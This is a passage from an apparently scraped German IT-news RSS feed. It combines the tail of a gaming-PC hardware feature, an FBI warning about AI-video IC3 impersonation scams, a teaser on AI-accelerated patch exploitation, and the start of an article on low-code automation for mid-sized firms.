<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a23f8a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/OCZ-RevoDrive-3-X2.jpg?quality=50&amp;strip=all" alt="OCZ RevoDrive 3 X2: SSD der Höllenmaschine 4" class="wp-image-3188932" width="1024" height="725" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die erste SSD in einer Höllenmaschine: OCZ RevoDrive 3 X2</figcaption></figure><p class="imageCredit">OCZ/Kioxia </p></div>



<p>Das interne Backup übernimmt ein RAID-5‑Verbund aus vier 1-Terabyte-Festplatten. Dabei kommt das derzeit schnellste 3,5-Zoll-Laufwerk im Test zum Einsatz, die <a href="https://web.archive.org/web/20121006075341/http://www.pcwelt.de/produkte/Test-Western-Digital-VelociRaptor-WD1000D-Festplatte-5763554.html">Western Digital VelociRaptor WD1000DHTZ</a>. Die VelociRaptor rotiert mit 10.000 Umdrehungen pro Minute und puffert Zugriffe in einem 64 MB großen Cache. Die maximale Datenrate der Festplatte liegt bei 210 Megabyte pro Sekunde, die durchschnittliche Zugriffszeit bei 3,7 Millisekunden. Als RAID-5‑Verbund kommt das Platten-Quartett auf bis zu 560 Megabyte pro Sekunde und stellt dabei noch knapp 2,7 Gigabyte nutzbare Kapazität zur Verfügung.</p>



<p>Die Aufgabe des klassischen Massenspeichers für umfangreiche Foto-, Musik- und Videosammlungen übernehmen die beiden 3,5-Zoll-Festplatten <a href="https://web.archive.org/web/20120922021349/http://www.pcwelt.de/produkte/Test-Western-Digital-Caviar-Green-WD30EZRX-6091202.html">Western Digital Caviar Green 3000GB WD30EZRX</a>. Die besonders stromsparenden Laufwerke stecken in den zwei abschließbaren Hot-Swap-Schächten der Höllenmaschine 4. So lassen sich schnell und bequem knapp 5,5 Terabyte nutzbarer Speicherplatz im laufenden Betrieb an- und abstöpseln oder auch mal unkompliziert von A nach B tragen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Stromversorgung: bis zu 105 Ampere auf der 12-Volt-Schiene</h2>



<p>Keine Kompromisse machen wir bei der Stromversorgung der Höllenmaschine 4. Das <a href="https://web.archive.org/web/20121005045440/http://coolermaster.de/product.php?product_id=6744" target="_blank" rel="noreferrer noopener">Cooler Master Silent Pro Hybrid 1300W</a> bietet genügend Reserven, um alle Komponenten zuverlässig mit Energie zu versorgen. Das vollständig modulare Netzteil stellt auf der 12-Volt-Schiene in der Spitze bis zu 105 Ampere bereit und federt damit auch locker die Lastspitzen der stromhungrigen Grafikkarten ab.</p>



<p>Aufgrund der “<a href="https://web.archive.org/web/20121005072013/http://www.plugloadsolutions.com/80PlusPowerSupplies.aspx">80 PLUS Gold</a>“-Zertifizierung arbeitet das ATX-2.3-Kraftpaket mit einem Wirkungsgrad von über 90 Prozent trotzdem sehr energieeffizient. Dank der semipassiven Kühlung ist das 1300-Watt-Netzteil aber auch flüsterleise. Zudem erlaubt die im Lieferumfang enthaltene 5,25-Zoll-Lüftersteuerung neben dem automatischen Modus ein stufenlos regulierbares Drehtempo für den 130-Millimeter-Lüfter – bei harter Dauerbelastung drehen Sie den Regler einfach voll auf.</p>



<p>Um optische Massenspeicher kümmert sich der Blu-ray-Brenner <a href="https://web.archive.org/web/20120905095420if_/http://www.asus.de/Optical_Storage/Internal_Bluray_Drive/BW12B1ST/">Asus BW-12B1ST</a>. Das Multi-Norm-Laufwerk versteht sich aber auch auf alle gängigen CD- und DVD-Formate. Bei maximal 12-fachem Schreibtempo füllt das Asus-Modell einen einlagigen 25-GB-BR-Rohling in rund 11 Minuten. BD-REs beschreibt das SATA-Laufwerk mit 2-fachem Tempo, Blu-ray-Medien liest er mit 8-facher Geschwindigkeit. Im Lieferumfang des Asus BW-12B1ST ist Software für das Backup, Brennen und Abspielen von Blu-rays enthalten.</p>



<h2 class="wp-block-heading toc">Peripherie: Luxus-Eingabegeräte und 5.1-Raumklang</h2>



<p>Die <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121027093942/http://www.logitech.com/de-de/mice-pointers/mice/5092">Logitech G9x Laser Mouse</a> kommt mit einem 4-Wege-Scrollrad und löst mit bis zu 5700 dpi auf. Die USB-Maus besitzt eine anpassbare Griffschale sowie ein bis auf 28 Gramm aufrüstbares Gewichtsmagazin. Der interne Speicher sichert bis zu fünf Profile für individuelle Tastatur-Makros und Abtastraten.</p>



<p>Das <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121007015940/http://www.logitech.com/de-de/keyboards/keyboards/4956">Logitech G19 Gaming Keyboard</a> besitzt ein integriertes Farb-LCD, das in Echtzeit Spiele-Informationen wie die Server-IP-Adresse oder den Punktestand für über 35 Titel anzeigt. Die G19 erlaubt verschiedene Beleuchtungsfarben und hat 12 voll programmierbare G-Tasten sowie Sondertasten für den schnellen Multimedia-Zugriff. Das Logitech-Modell fungiert aber auch als aktiver 2-fach-USB-Hub und überrascht mit einer Kabelführung auf der Unterseite für Maus und Headset.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a247c5"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Logitech-G19-Gaming-Keyboard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Logitech G19 Gaming Keyboard" class="wp-image-3190427" width="1200" height="816" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech</p></div>



<p>Das THX-zertifizierte Lautsprecherset <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20120927123116/http://www.logitech.com/de-de/speakers-audio/home-pc-speakers/speaker-system-Z906">Logitech Z906</a> bietet 5.1-Raumklang mit digitaler Dolby- und DTS-Decodierung. Bis zu sechs digitale und analoge Audioquellen lassen sich gleichzeitig an die Bedienkonsole anschließen. Alternativ bedienen Sie das 500-Watt-Lautsprechersystem kabellos über die Fernbedienung.</p>



<p>Wer nachts die Nachbarn nicht stören darf, greift zum <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121014132143/http://www.logitech.com/de-de/gaming/headsets/7248">Logitech G930 Wireless Gaming Headset</a>. Das funkt digital mit 2,4 Gigahertz zehn Stunden lang über eine Reichweite von bis zu 12 Metern. Das Headset kommt mit drei programmierbaren Tasten, Geräuschunterdrückung und Kondensatormikrofon. Dank der Dolby-Technik Headphone und Pro Logic II kann das G930 sogar 7.1-Surround-Sound simulieren.</p>



<h2 class="wp-block-heading toc">Kreativ-, Spiele- und Office-Paket für 4000 Euro</h2>



<p>Auf der Höllenmaschine 4 vorinstalliert haben wir das 64-Bit-Betriebssystem <a href="https://web.archive.org/web/20121004014010/http://www.pcwelt.de/special/Windows-7-1001833.html">Windows 7 Ultimate</a>. Für das Microsoft-Betriebssystem haben wir uns auch wegen der DirectX-11-Unterstützung entschieden. Das laut Windows-Experte Hermann Apfelböck “beste Windows aller Zeiten” verwöhnt in der multilingualen Ultimate-Variante mit den exklusiven Funktionen Bitlocker-Verschlüsselung und dem nützlichen VHD-Boot.</p>



<p>Dazu gibt es drei fette Software-Pakete frei Haus. Das Highlight für Kreative ist die <a href="https://web.archive.org/web/20120701102134/http://success.adobe.com/de/de/sem/products/creativesuite/dwp.html">Adobe Creative Suite 6 Design &amp; Web Premium</a>. Die „Rundum glücklich“-Lösung für professionelle Bildbearbeitung, Layout und Website-Design integriert die Digital Publishing Suite und enthält folgende Programme und Werkzeuge: Acrobat X Pro, Bridge, Dreamweaver, Flash Builder, Flash Professional, Fireworks, Illustrator, InDesign, Media Encoder und Photoshop Extended.</p>



<p>Was zum Spielen spendiert Grafikspezialist Nvidia der Höllenmaschine 4. Das Gaming-Paket enthält die AAA-Titel Alan Wake Collector’s Edition, Batman: Arkham City, Battlefield 3, Borderlands, Call of Duty: Modern Warfare 3, Crysis 2, Diablo 3, Deus Ex: Human Revolution, Duke Nukem Forever, L.A. Noire, Mass Effect 3, Max Payne 3, Metro 2033, Rage, Skyrim, Starcraft II: Wings of Liberty, Star Wars. The Old Republik, The Witcher 2: Assassins of Kings.</p>



<p>Und wer die Höllenmaschine im Büroeinsatz unterfordern will, installiert <a href="https://web.archive.org/web/20101125155934/http://www.pcwelt.de/news/Jetzt-fuer-alle-Microsoft-Office-2010-ab-sofort-verfuegbar-988766.html">Microsoft Office Professional 2010</a>. Das Paket enthält die Programme Access, Excel, InfoPath, OneNote, Outlook, Powerpoint, Publisher, SharePoint, Word und Workspace.</p>



<p>Hinweis: Hier endet der Artikel über die Höllenmaschine 4 aus dem Jahre 2014.</p>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern:</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Updates IC3 Scam Warning Over AI Videos Targeting Victims]]></title>
<description><![CDATA[The FBI IC3 scam has evolved into a broader fraud scheme in which criminals impersonate FBI personnel and the Internet Crime Complaint Center (IC3) to target people who have already fallen victim to scams. According to an updated Public Service Announcement (PSA), scammers are using AI-generated ...]]></description>
<link>https://tsecurity.de/de/3685580/it-security-nachrichten/fbi-updates-ic3-scam-warning-over-ai-videos-targeting-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685580/it-security-nachrichten/fbi-updates-ic3-scam-warning-over-ai-videos-targeting-victims/</guid>
<pubDate>Wed, 22 Jul 2026 10:08:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="FBI IC3 scam" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp 1536w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp 1536w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="FBI Updates IC3 Scam Warning Over AI Videos Targeting Victims 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="493" data-end="949">The FBI IC3 scam has evolved into a broader fraud scheme in which criminals impersonate FBI personnel and the <a href="https://thecyberexpress.com/scam-centers-in-southeast-asia/" target="_blank" rel="noopener">Internet Crime Complaint Center</a> (IC3) to target people who have already fallen victim to scams. According to an updated <a href="https://www.ic3.gov/PSA/2025/PSA250418" target="_blank" rel="nofollow noopener">Public Service Announcement</a> (PSA), scammers are using <a href="https://thecyberexpress.com/will-ai-generated-cyberattacks-surge-in-future/" target="_blank" rel="noopener">AI-generated videos</a>, <a href="https://thecyberexpress.com/ways-social-media-is-fuelling-cybercrime/" target="_blank" rel="noopener">fake social media profiles</a>, and spoofed websites to create a false sense of trust while attempting to steal personal and financial information.</p>
<p data-start="951" data-end="1367">The updated warning describes several exploitation tactics, including targeting previous scam victims, using artificial intelligence to create fictitious or misleading promotional materials, and building fake websites designed to collect personally identifiable information. The scammers falsely claim to be affiliated with government agencies or law enforcement and often promise to help victims recover lost funds.</p>

<h3 data-section-id="196yc7a" data-start="1369" data-end="1420"><strong><span role="text">FBI IC3 Scam Targets Previous Fraud Victims</span></strong></h3>
<p data-start="1422" data-end="1642">In one version of the FBI IC3 <a class="wpil_keyword_link" href="https://cyble.com/tech-scam/" target="_blank" rel="noopener" title="scam" data-wpil-keyword-link="linked" data-wpil-monitor-id="29073">scam</a>, criminals create fake social media profiles and pages that impersonate FBI personnel. The goal is to lure previous <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-scam-tips-for-safety/" title="scam" data-wpil-keyword-link="linked" data-wpil-monitor-id="29077">scam</a> victims into what the PSA describes as "re-targeting" scams.</p>
<p data-start="1644" data-end="1926">After realizing they have been defrauded, victims may tell the original scammers they plan to report the incident to the FBI and submit an IC3 complaint. The victim is then contacted by someone pretending to be an FBI agent through platforms such as Facebook Messenger and Telegram.</p>
<p data-start="1928" data-end="2139">The impersonator may send a link claiming to <a href="https://www.ic3.gov/PSA/2026/PSA260720" target="_blank" rel="nofollow noopener">update an existing IC3 complaint</a>. The link could contain malicious code or collect additional financial information, allowing criminals to further <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29074">exploit</a> the victim.</p>
<p data-start="2141" data-end="2445">In other cases, scammers approach victims through email, phone calls, social media advertisements, or online forums. They claim to have recovered lost funds or offer assistance in recovering money. The FBI warning states these claims are a ruse designed to revictimize people who have already lost money.</p>

<h3 data-section-id="j1jslh" data-start="2447" data-end="2503"><span role="text"><strong data-start="2451" data-end="2503">AI-Generated Videos Promote Spoofed IC3 Websites</strong></span></h3>
<p data-start="2505" data-end="2724">Another version of the scheme involves AI-generated videos or <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-are-deepfakes/" target="_blank" rel="noopener" title="deepfakes" data-wpil-keyword-link="linked" data-wpil-monitor-id="29075">deepfakes</a> featuring individuals impersonating FBI personnel. The videos are used on social media to promote spoofed versions of the official IC3 website.</p>
<p data-start="2726" data-end="3010">One reported example involved an AI-generated video depicting a senior FBI leader encouraging users to submit complaints through a <a href="https://thecyberexpress.com/planning-and-zoning-permit-phishing-scam/" target="_blank" rel="noopener">fake IC3 website</a>. The spoofed site was designed to resemble the legitimate government website, but its functionality was limited to complaint submission.</p>
<p data-start="3012" data-end="3257">The fake complaint form requested information including a user's name, phone number, email address, scam type, and estimated financial loss. After submission, the site provided a reference number and claimed someone would contact the individual.</p>

<h3 data-section-id="17fdwcn" data-start="3259" data-end="3316"><strong><span role="text">How to Spot AI-Generated Videos and Fake Messages</span></strong></h3>
<p data-start="3318" data-end="3633">The PSA warns that scammers can use AI-generated videos and cloned voices to impersonate company executives, law enforcement personnel, and other authority figures. These materials may be used during real-time video chats or private communications to convince victims they are speaking with a legitimate person.</p>
<p data-start="3635" data-end="3986">People are advised to carefully examine email addresses, phone numbers, URLs, and spelling for subtle inconsistencies. Potential warning signs in manipulated images and videos include distorted hands or feet, unrealistic facial features, irregular faces, unusual accessories, inaccurate shadows, watermarks, unnatural movements, and voice call delays.</p>
<p data-start="3988" data-end="4235">The FBI also advises people to be cautious when online content triggers strong emotions such as fear, anger, or disbelief. Users should verify surprising videos or images through reputable <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="news" data-wpil-keyword-link="linked" data-wpil-monitor-id="29076">news</a> sources or known official channels before responding.</p>
<p data-start="4237" data-end="4538">IC3 does not maintain a social media presence and will not contact individuals directly through phone, email, social media, messaging apps, online chats, or public forums. The agency also does not recover funds for victims through Facebook or Telegram and will never request payment for fund recovery.</p>
<p data-start="4540" data-end="4834">People seeking to file an IC3 complaint should type <a class="decorated-link" href="http://www.ic3.gov/" target="_blank" rel="nofollow noopener" data-start="4594" data-end="4605">www.ic3.gov</a> directly into their browser and verify that the website address ends in ".gov." Victims should avoid sponsored search results and suspicious links, and should never share sensitive information with websites they cannot verify.</p>
<p data-start="4836" data-end="5068" data-is-last-node="" data-is-only-node="">Anyone who has fallen victim to the scam should report it through the legitimate IC3 website and provide details about the person or company involved, communication methods, financial transactions, and interactions with the scammer.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[N-Hour statt N-Day: Warum Patch-Schnelligkeit keine Sicherheit mehr garantiert]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Neue KI-Modelle machen aus einem veröffentlichten Patch in kürzester Zeit wieder funktionierende Exploits. Das verschiebt die Verteidiger-Rolle: Nicht nur die Patch-Rate, sondern die Frage nach tatsächlicher Ausnutzbarkeit wird entscheidend. Dabei zeigen Branchenkennzahlen,...]]></description>
<link>https://tsecurity.de/de/3685460/it-security-nachrichten/n-hour-statt-n-day-warum-patch-schnelligkeit-keine-sicherheit-mehr-garantiert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685460/it-security-nachrichten/n-hour-statt-n-day-warum-patch-schnelligkeit-keine-sicherheit-mehr-garantiert/</guid>
<pubDate>Wed, 22 Jul 2026 08:55:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-n-hour-patch-exploit-validation-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Neue KI-Modelle machen aus einem veröffentlichten Patch in kürzester Zeit wieder funktionierende Exploits. Das verschiebt die Verteidiger-Rolle: Nicht nur die Patch-Rate, sondern die Frage nach tatsächlicher Ausnutzbarkeit wird entscheidend. Dabei zeigen Branchenkennzahlen, dass Lücken zwischen Veröffentlichung und vollständiger Absicherung weiterhin groß bleiben. Wer heute patcht, braucht parallel ein Validierungs- und Simulationsprogramm, […]</p>
<div><a href="https://www.it-boltwise.de/n-hour-statt-n-day-warum-patch-schnelligkeit-keine-sicherheit-mehr-garantiert.html">... den vollständigen Artikel <strong>»N-Hour statt N-Day: Warum Patch-Schnelligkeit keine Sicherheit mehr garantiert«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/n-hour-statt-n-day-warum-patch-schnelligkeit-keine-sicherheit-mehr-garantiert.html">N-Hour statt N-Day: Warum Patch-Schnelligkeit keine Sicherheit mehr garantiert</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[So sparen Mittelständler 6 Monate Implementierungszeit]]></title>
<description><![CDATA[KI und Low-Code gehen gut zusammen – und können Mittelständler entscheidend voranbringen, wenn die Voraussetzungen stimmen.dotshock | shutterstock.com



Es würde mich nicht wundern, wenn Ihnen dieses Szenario bekannt vorkommt. Denn Situationen wie diese sind keine Ausnahme. Laut der Trovarit-Stu...]]></description>
<link>https://tsecurity.de/de/3685217/it-security-nachrichten/so-sparen-mittelstaendler-6-monate-implementierungszeit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685217/it-security-nachrichten/so-sparen-mittelstaendler-6-monate-implementierungszeit/</guid>
<pubDate>Wed, 22 Jul 2026 06:10:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/dotshock_shutterstock_2311435343_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Devs App 16z9" class="wp-image-4196102" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">KI und Low-Code gehen gut zusammen – und können Mittelständler entscheidend voranbringen, wenn die Voraussetzungen stimmen.</figcaption></figure><p class="imageCredit">dotshock | shutterstock.com</p></div>



<p class="wp-block-paragraph">Es würde mich nicht wundern, wenn Ihnen dieses Szenario bekannt vorkommt. Denn Situationen wie diese sind keine Ausnahme. Laut der Trovarit-Studie „<a href="https://www.trovarit.com/ueber-uns/presse/studie-erp-in-der-praxis-2024-25/" target="_blank" rel="noreferrer noopener">ERP in der Praxis 2024/25</a>“, für die über 1.700 DACH-Unternehmen befragt wurden, nimmt eine typische ERP-Einführung im Mittelstand zwischen <strong>zehn</strong> und <strong>dreizehn</strong> <strong>Monaten</strong> in Anspruch. Parallel werden in mehr als der Hälfte der Projekte Zeit- oder Budgetziele <strong>nicht eingehalten</strong>. Die Implementierungskosten pro Nutzer liegen demnach bei durchschnittlich <strong>5.917 Euro</strong>, wobei Schulung, Datenmigration und Anpassung <strong>50 bis 70 Prozent der Gesamtkosten</strong> ausmachen – nicht die Lizenz.</p>



<p class="wp-block-paragraph">Für einen Konzern mit 800 Mitarbeitern, SAP-Legacy und drei Produktionsstandorten sind das keine Schreckenszahlen. Für einen Immobilienmakler mit 40 Mitarbeitern, der seine Angebote automatisiert versenden will oder einen Steuerberater, der Mandantenpost automatisch klassifizieren möchte, durchaus. Diese Mittelständler brauchen kein <a href="https://www.computerwoche.de/article/2834026/12-erp-katastrophen.html" target="_blank">ERP-Projekt</a>, sondern im Wesentlichen drei funktionierende Workflows.</p>



<h2 class="wp-block-heading">Das Low-Code-Versprechen – und die KMU-Praxis</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2833861/7-wege-zur-low-code-innovation.html" target="_blank">Low-Code</a>– und KI-Automatisierungsplattformen wie n8n oder Make.com versprechen, die Lücke zwischen ERP-Großprojekt und Stillstand aufzulösen. Dabei ist anzumerken, dass beide Plattformen keinen Ersatz für ein ERP darstellen: Sie substituieren keine Stücklisten-Verwaltung, keine mehrstufige Fertigungsplanung und keine IFRS-Konsolidierung. Dafür ist weiterhin ein ERP nötig.</p>



<p class="wp-block-paragraph">Aber Plattformen wie die beiden genannten stellen Verbindungen zwischen Systemen her, die keine native Schnittstelle haben. Entscheidungen automatisieren, die nach klaren Regeln getroffen werden und Workflows bauen, die bisher über E-Mail, Excel-Export und Telefonanruf abgewickelt werden – das sind für den deutschen Mittelstand oft genau die Prozesse, die täglich die meiste Zeit kosten und zugleich selten im ERP verortet sind. Vielmehr sitzen diese in Outlook-Ordnern, in freigegebenen Tabellenblättern und in den Routinen von Mitarbeitern, die „das schon immer so machen”.</p>



<p class="wp-block-paragraph">Das <a href="https://www.kfw.de/PDF/Download-Center/Konzernthemen/Research/PDF-Dokumente-Fokus-Volkswirtschaft/Fokus-2026/Fokus-Nr.-533-Februar-2026-KI-Mittelstand.pdf" target="_blank" rel="noreferrer noopener">KfW-Mittelstandspanel vom Februar 2026</a> (PDF) stellt fest, dass <strong>20 Prozent</strong> der mittelständischen Unternehmen in Deutschland KI einsetzen – fünfmal mehr als noch im Jahr 2018. Bei Unternehmen mit über 50 Mitarbeitern liegt die Quote bereits bei <strong>36 Prozent</strong>. KI ist im Mittelstand also angekommen. Die Frage ist nur, in welcher Form. Hier hilft ein Blick auf die KPMG-Studie „<a href="https://kpmg.com/de/de/themen/digital-transformation/digitale-rechnungslegung-2025-2026.html" target="_blank" rel="noreferrer noopener">Digitalisierung im Rechnungswesen 2025/2026</a>“. Demnach:</p>



<ul class="wp-block-list">
<li>setzen <strong>53 Prozent</strong> der Befragten KI in der Buchhaltung ein oder befinden sich gerade in der Einführungsphase.</li>



<li>berichten <strong>37 Prozent</strong> dadurch von sofortigen Zeiteinsparungen bei transaktionalen Prozessen.</li>
</ul>



<p class="wp-block-paragraph">Was diese Studien allerdings nicht zeigen, ist der Implementierungsaufwand. Und genau hier liegt der große Unterschied zwischen dem KI-Einsatz per Low-Code und einem ERP-Einführungsprojekt. Das verdeutlichen die folgenden drei Anwendungsfälle für KMU im Bereich KI und Low-Code. Diese sind dazu geeignet, innerhalb von Wochen (statt Monaten oder Jahren) Ergebnisse zu liefern:</p>



<ul class="wp-block-list">
<li><strong>Rechnungseingang:</strong> PDF-Rechnungen oder XRechnung-Dokumente <a href="https://www.computerwoche.de/article/4190560/e-rechnungspflicht-das-lost-kein-erp-alleine.html" target="_blank">entgegennehmen</a>, relevante Felder per KI extrahieren und gegen ERP-Stammdaten prüfen oder vorkontierte Buchungsvorschläge generieren – was früher ein Buchhalter täglich in Stunden manuell erledigte, kann heute als Hintergrundprozess laufen. Dabei werden Fehler weiterhin von Menschen überprüft, statt automatisch in die Buchung zu laufen. Die typische Implementierungszeit hierfür liegt (in überschaubaren Setups) bei <strong>zwei bis vier Wochen</strong>.</li>



